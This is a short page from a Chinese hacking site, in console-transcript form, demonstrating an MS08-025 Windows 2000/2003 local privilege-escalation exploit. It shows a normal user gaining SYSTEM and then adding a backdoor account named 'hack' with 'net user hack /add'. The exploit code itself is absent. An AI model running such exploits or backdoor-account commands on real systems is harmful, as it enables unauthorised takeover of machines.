当前位置：学院首页 >> 开发 >> 缓冲溢出 >> MS08-025 for win2k win2k3

MS08-025 for win2k win2k3

2008-04-29 13:35:26 www.hackbase.com 来源：互联网

Win2k CN SP2 ，Win2k3 CN SP1下测试通过，其它未测试(不装XP那种垃圾)D:\>whoamiBAICKER-VMWARE\009D:\>net user hack /add系统发生 5 错误。拒绝访问。 D:\>ms08025 whoamiMS08-025 Windows Local Privi ...

Win2k CN SP2 ，Win2k3 CN SP1下测试通过，其它未测试(不装XP那种垃圾)
D:\>whoami
BAICKER-VMWARE\009
D:\>net user hack /add
系统发生 5 错误。
拒绝访问。

D:\>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe … ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable … Get ZwVdmControl Number … ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode…
NT AUTHORITY\SYSTEM
D:\>ms08025 “net user hack /add”
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe … ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable … Get ZwVdmControl Number … ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode…
D:\>命令成功完成。
D:\>net user
\\BAICKER-VMWARE 的用户帐户
——————————————————————————-
009 Administrator Guest
hack IUSR_BAICKER-VMWARE IWAM_BAICKER-VMWARE
TsInternetUser
命令成功完成。
D:\>